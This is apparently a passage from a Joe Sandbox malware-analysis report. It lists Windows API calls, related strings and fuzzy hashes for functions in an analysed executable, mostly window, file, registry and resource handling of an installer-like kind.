                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                    • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                                    • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                    • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                                    APIs
                                                                                      • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                                      • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                                    • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountErrorFileLastMoveTick
                                                                                    • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                    • API String ID: 2406187244-2685451598
                                                                                    • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                    • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                                    • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                    • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 00413D56
                                                                                    • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                      • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                                      • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                                    • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CursorDesktopWindow$Show
                                                                                    • String ID:
                                                                                    • API String ID: 2074268717-0
                                                                                    • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                    • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                                    • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                    • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                    • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                    • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString$FileMessageModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 704749118-0
                                                                                    • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                    • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
                                                                                    • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                    • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                                      • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                                    • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                                      • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                    • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                                    • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                    • String ID:
                                                                                    • API String ID: 855768636-0
                                                                                    • Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                                    • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
                                                                                    • Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                                    • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                                    APIs
                                                                                    • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                                    • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                                    • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                                    • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: OffsetRect
                                                                                    • String ID:
                                                                                    • API String ID: 177026234-0
                                                                                    • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                    • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                                    • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                    • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                                    APIs
                                                                                    • GetCursorPos.USER32 ref: 00417270
                                                                                    • SetCursor.USER32(00000000), ref: 004172B3
                                                                                    • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                    • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1959210111-0
                                                                                    • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                    • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                                    • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                    • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                    • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                                    • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                    • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                                    APIs
                                                                                    • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                    • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                    • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    • Opcode ID: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                    • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                                    • Opcode Fuzzy Hash: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                    • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                    • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                    • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                                    • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                    • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                    • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                    • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                                    Strings
                                                                                    • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                                    • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                                    • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                    • API String ID: 1452528299-1392080489
                                                                                    • Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                    • Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
                                                                                    • Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                    • Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                                    • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                    • String ID:
                                                                                    • API String ID: 4283692357-0
                                                                                    • Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                    • Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
                                                                                    • Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                    • Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5
                                                                                    Strings
                                                                                    • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                                    • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                                    • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                    • API String ID: 1452528299-3038984924
                                                                                    • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                    • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                                    • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                    • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                    • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                                    • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                    • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                    • String ID:
                                                                                    • API String ID: 215268677-0
                                                                                    • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                    • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                                    • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                    • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                                    APIs
                                                                                    • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                    • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                    • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                    • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                    • String ID:
                                                                                    • API String ID: 2280970139-0
                                                                                    • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                    • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                    • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                    • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
